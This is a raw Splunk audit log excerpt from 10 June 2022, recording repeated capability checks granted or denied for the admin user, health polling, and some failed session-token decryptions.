Audit:[timestamp=10-06-2022 17:37:30.796, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.796, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.796, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.796, user=admin, action=edit_telemetry_settings, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.795, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.795, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.795, user=admin, action=list_workload_rules, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.795, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.795, user=admin, action=indexes_edit, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.795, user=admin, action=edit_user, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.795, user=admin, action=edit_user, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.795, user=admin, action=edit_tokens_all, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.795, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.795, user=admin, action=edit_sourcetypes, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.795, user=admin, action=edit_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.795, user=admin, action=edit_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.795, user=admin, action=change_authentication, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.795, user=admin, action=edit_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.795, user=admin, action=license_edit, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.795, user=admin, action=license_edit, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.795, user=admin, action=list_health, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.795, user=admin, action=edit_health, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.795, user=admin, action=edit_global_banner, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.795, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.795, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.795, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.795, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.795, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.795, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.795, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.795, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.795, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.795, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.795, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.795, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.795, user=admin, action=edit_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.795, user=admin, action=list_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.795, user=admin, action=indexes_edit, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.795, user=admin, action=edit_search_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.795, user=admin, action=edit_dist_peer, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.795, user=admin, action=edit_deployment_client, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.795, user=admin, action=list_deployment_client, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.795, user=admin, action=indexes_edit, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.795, user=admin, action=fsh_manage, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.795, user=admin, action=edit_search_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.795, user=admin, action=edit_dist_peer, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.794, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.794, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.794, user=admin, action=edit_monitor, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.794, user=admin, action=edit_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.794, user=admin, action=list_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.794, user=admin, action=edit_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.794, user=admin, action=list_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.794, user=admin, action=edit_udp, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.794, user=admin, action=edit_tcp, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.794, user=admin, action=edit_splunktcp, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.794, user=admin, action=list_inputs, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.794, user=admin, action=edit_scripted, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.794, user=admin, action=edit_monitor, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.794, user=admin, action=edit_token_http, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.794, user=admin, action=indexes_edit, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.794, user=admin, action=edit_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.794, user=admin, action=restart_splunkd, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.794, user=admin, action=edit_indexer_cluster, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.794, user=admin, action=edit_indexer_cluster, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.794, user=admin, action=edit_indexer_cluster, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.794, user=admin, action=change_authentication, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.794, user=admin, action=edit_user, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.794, user=admin, action=edit_roles, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.794, user=admin, action=edit_win_wmiconf, info=denied ] Audit:[timestamp=10-06-2022 17:37:30.794, user=admin, action=edit_win_regmon, info=denied ] Audit:[timestamp=10-06-2022 17:37:30.794, user=admin, action=edit_modinput_winprintmon, info=denied ] Audit:[timestamp=10-06-2022 17:37:30.794, user=admin, action=edit_modinput_perfmon, info=denied ] Audit:[timestamp=10-06-2022 17:37:30.794, user=admin, action=edit_modinput_winnetmon, info=denied ] Audit:[timestamp=10-06-2022 17:37:30.794, user=admin, action=edit_modinput_winhostmon, info=denied ] Audit:[timestamp=10-06-2022 17:37:30.794, user=admin, action=edit_win_eventlogs, info=denied ] Audit:[timestamp=10-06-2022 17:37:30.794, user=admin, action=edit_modinput_admon, info=denied ] Audit:[timestamp=10-06-2022 17:37:30.794, user=admin, action=edit_tcp_stream, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.794, user=admin, action=edit_upload_and_index, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.794, user=admin, action=edit_tcp_stream, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.794, user=admin, action=edit_upload_and_index, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.794, user=admin, action=edit_roles, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.792, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.792, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.792, user=admin, action=rest_apps_view, info=granted ] Audit:[timestamp=10-06-2022 17:37:30.790, user=admin, action=edit_user, info=granted object="admin" operation=edit] Audit:[timestamp=10-06-2022 17:37:30.789, user=admin, action=edit_user, info=granted object="admin" operation=list] Audit:[timestamp=10-06-2022 17:37:29.750, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.750, user=admin, action=list_workload_rules, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.750, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.750, user=admin, action=indexes_edit, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.750, user=admin, action=edit_user, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.750, user=admin, action=edit_user, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.750, user=admin, action=edit_tokens_all, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.750, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.750, user=admin, action=edit_sourcetypes, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.750, user=admin, action=edit_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.750, user=admin, action=edit_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.750, user=admin, action=change_authentication, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.750, user=admin, action=edit_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.750, user=admin, action=license_edit, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.750, user=admin, action=license_edit, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.750, user=admin, action=list_health, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.750, user=admin, action=edit_health, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.750, user=admin, action=edit_global_banner, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.750, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.750, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.750, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.750, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.750, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.750, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.750, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.750, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.750, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.750, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.750, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.750, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.750, user=admin, action=edit_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.750, user=admin, action=list_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.750, user=admin, action=indexes_edit, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.750, user=admin, action=edit_search_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.750, user=admin, action=edit_dist_peer, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.749, user=admin, action=edit_deployment_client, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.749, user=admin, action=list_deployment_client, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.749, user=admin, action=indexes_edit, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.749, user=admin, action=fsh_manage, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.749, user=admin, action=edit_search_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.749, user=admin, action=edit_dist_peer, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.749, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.749, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.749, user=admin, action=edit_monitor, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.749, user=admin, action=edit_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.749, user=admin, action=list_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.749, user=admin, action=edit_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.749, user=admin, action=list_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.749, user=admin, action=edit_udp, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.749, user=admin, action=edit_tcp, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.749, user=admin, action=edit_splunktcp, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.749, user=admin, action=list_inputs, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.749, user=admin, action=edit_scripted, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.749, user=admin, action=edit_monitor, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.749, user=admin, action=edit_token_http, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.749, user=admin, action=indexes_edit, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.749, user=admin, action=edit_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.749, user=admin, action=restart_splunkd, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.749, user=admin, action=edit_indexer_cluster, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.749, user=admin, action=edit_indexer_cluster, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.749, user=admin, action=edit_indexer_cluster, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.749, user=admin, action=change_authentication, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.749, user=admin, action=edit_user, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.749, user=admin, action=edit_roles, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.749, user=admin, action=edit_win_wmiconf, info=denied ] Audit:[timestamp=10-06-2022 17:37:29.749, user=admin, action=edit_win_regmon, info=denied ] Audit:[timestamp=10-06-2022 17:37:29.749, user=admin, action=edit_modinput_winprintmon, info=denied ] Audit:[timestamp=10-06-2022 17:37:29.749, user=admin, action=edit_modinput_perfmon, info=denied ] Audit:[timestamp=10-06-2022 17:37:29.749, user=admin, action=edit_modinput_winnetmon, info=denied ] Audit:[timestamp=10-06-2022 17:37:29.749, user=admin, action=edit_modinput_winhostmon, info=denied ] Audit:[timestamp=10-06-2022 17:37:29.749, user=admin, action=edit_win_eventlogs, info=denied ] Audit:[timestamp=10-06-2022 17:37:29.749, user=admin, action=edit_modinput_admon, info=denied ] Audit:[timestamp=10-06-2022 17:37:29.749, user=admin, action=edit_tcp_stream, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.749, user=admin, action=edit_upload_and_index, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.749, user=admin, action=edit_tcp_stream, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.749, user=admin, action=edit_upload_and_index, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.749, user=admin, action=edit_roles, info=granted ] Audit:[timestamp=10-06-2022 17:37:29.749, user=admin, action=rest_apps_view, info=granted ] Audit:[timestamp=10-06-2022 17:37:27.382, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:37:19.630, user=n/a, action=read_session_token, info=denied, reason="cannot decrypt token"] Audit:[timestamp=10-06-2022 17:37:17.380, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:37:17.243, user=admin, action=list_health, info=granted object="deployment" operation=list] Audit:[timestamp=10-06-2022 17:37:17.125, user=admin, action=rest_properties_get, info=granted REST: /static/appIcon_2x.png] Audit:[timestamp=10-06-2022 17:37:17.118, user=admin, action=rest_properties_get, info=granted REST: /static/appIcon_2x.png] Audit:[timestamp=10-06-2022 17:37:17.107, user=admin, action=rest_properties_get, info=granted REST: /static/appIcon_2x.png] Audit:[timestamp=10-06-2022 17:37:17.107, user=admin, action=rest_properties_get, info=granted REST: /static/appIcon_2x.png] Audit:[timestamp=10-06-2022 17:37:16.983, user=admin, action=edit_telemetry_settings, info=granted object="general" operation=list] Audit:[timestamp=10-06-2022 17:37:16.740, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.740, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.740, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.740, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.739, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.739, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.739, user=admin, action=edit_telemetry_settings, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.739, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=list_workload_rules, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=indexes_edit, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=edit_user, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=edit_user, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=edit_tokens_all, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=edit_sourcetypes, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=edit_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=edit_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=change_authentication, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=edit_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=license_edit, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=license_edit, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=list_health, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=edit_health, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=edit_global_banner, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=edit_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=list_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=indexes_edit, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=edit_search_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=edit_dist_peer, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=edit_deployment_client, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=list_deployment_client, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=indexes_edit, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=fsh_manage, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=edit_search_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=edit_dist_peer, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=edit_monitor, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=edit_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=list_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=edit_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=list_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=edit_udp, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=edit_tcp, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=edit_splunktcp, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=list_inputs, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=edit_scripted, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=edit_monitor, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=edit_token_http, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=indexes_edit, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=edit_server, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=restart_splunkd, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=edit_indexer_cluster, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=edit_indexer_cluster, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=edit_indexer_cluster, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=change_authentication, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=edit_user, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.738, user=admin, action=edit_roles, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.737, user=admin, action=edit_win_wmiconf, info=denied ] Audit:[timestamp=10-06-2022 17:37:16.737, user=admin, action=edit_win_regmon, info=denied ] Audit:[timestamp=10-06-2022 17:37:16.737, user=admin, action=edit_modinput_winprintmon, info=denied ] Audit:[timestamp=10-06-2022 17:37:16.737, user=admin, action=edit_modinput_perfmon, info=denied ] Audit:[timestamp=10-06-2022 17:37:16.737, user=admin, action=edit_modinput_winnetmon, info=denied ] Audit:[timestamp=10-06-2022 17:37:16.737, user=admin, action=edit_modinput_winhostmon, info=denied ] Audit:[timestamp=10-06-2022 17:37:16.737, user=admin, action=edit_win_eventlogs, info=denied ] Audit:[timestamp=10-06-2022 17:37:16.737, user=admin, action=edit_modinput_admon, info=denied ] Audit:[timestamp=10-06-2022 17:37:16.737, user=admin, action=edit_tcp_stream, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.737, user=admin, action=edit_upload_and_index, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.737, user=admin, action=edit_tcp_stream, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.737, user=admin, action=edit_upload_and_index, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.737, user=admin, action=edit_roles, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.736, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.735, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.735, user=admin, action=rest_apps_view, info=granted ] Audit:[timestamp=10-06-2022 17:37:16.733, user=admin, action=edit_user, info=granted object="admin" operation=edit] Audit:[timestamp=10-06-2022 17:37:16.733, user=admin, action=edit_user, info=granted object="admin" operation=list] Audit:[timestamp=10-06-2022 17:37:15.985, user=admin, action=search, info=granted REST: /search/timeparser/tz] Audit:[timestamp=10-06-2022 17:37:07.622, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:36:57.954, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:36:49.608, user=n/a, action=read_session_token, info=denied, reason="cannot decrypt token"] Audit:[timestamp=10-06-2022 17:36:47.954, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:36:38.113, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:36:27.775, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:36:19.569, user=n/a, action=read_session_token, info=denied, reason="cannot decrypt token"] Audit:[timestamp=10-06-2022 17:36:17.627, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:36:07.226, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:35:58.880, user=admin, action=edit_telemetry_settings, info=granted object="general" operation=edit] Audit:[timestamp=10-06-2022 17:35:57.265, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:35:57.216, user=admin, action=rest_properties_get, info=granted REST: /static/appIcon_2x.png] Audit:[timestamp=10-06-2022 17:35:57.216, user=admin, action=rest_properties_get, info=granted REST: /static/appIcon_2x.png] Audit:[timestamp=10-06-2022 17:35:57.216, user=admin, action=rest_properties_get, info=granted REST: /static/appIcon_2x.png] Audit:[timestamp=10-06-2022 17:35:57.210, user=admin, action=rest_properties_get, info=granted REST: /static/appIcon_2x.png] Audit:[timestamp=10-06-2022 17:35:57.046, user=admin, action=list_health, info=granted object="deployment" operation=list] Audit:[timestamp=10-06-2022 17:35:56.903, user=admin, action=edit_telemetry_settings, info=granted object="general" operation=list] Audit:[timestamp=10-06-2022 17:35:56.688, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.688, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.688, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.688, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.687, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.687, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.687, user=admin, action=edit_telemetry_settings, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.686, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.686, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.686, user=admin, action=list_workload_rules, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.686, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.686, user=admin, action=indexes_edit, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.686, user=admin, action=edit_user, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.686, user=admin, action=edit_user, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.686, user=admin, action=edit_tokens_all, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.686, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.686, user=admin, action=edit_sourcetypes, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.686, user=admin, action=edit_server, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.686, user=admin, action=edit_server, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.686, user=admin, action=change_authentication, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.686, user=admin, action=edit_server, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.686, user=admin, action=license_edit, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.686, user=admin, action=license_edit, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.686, user=admin, action=list_health, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.686, user=admin, action=edit_health, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.686, user=admin, action=edit_global_banner, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.686, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.686, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.686, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.686, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.686, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.686, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.686, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.686, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.686, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.686, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.685, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.685, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:35:56.685, user=admin, action=edit_forwarders, info=granted ] 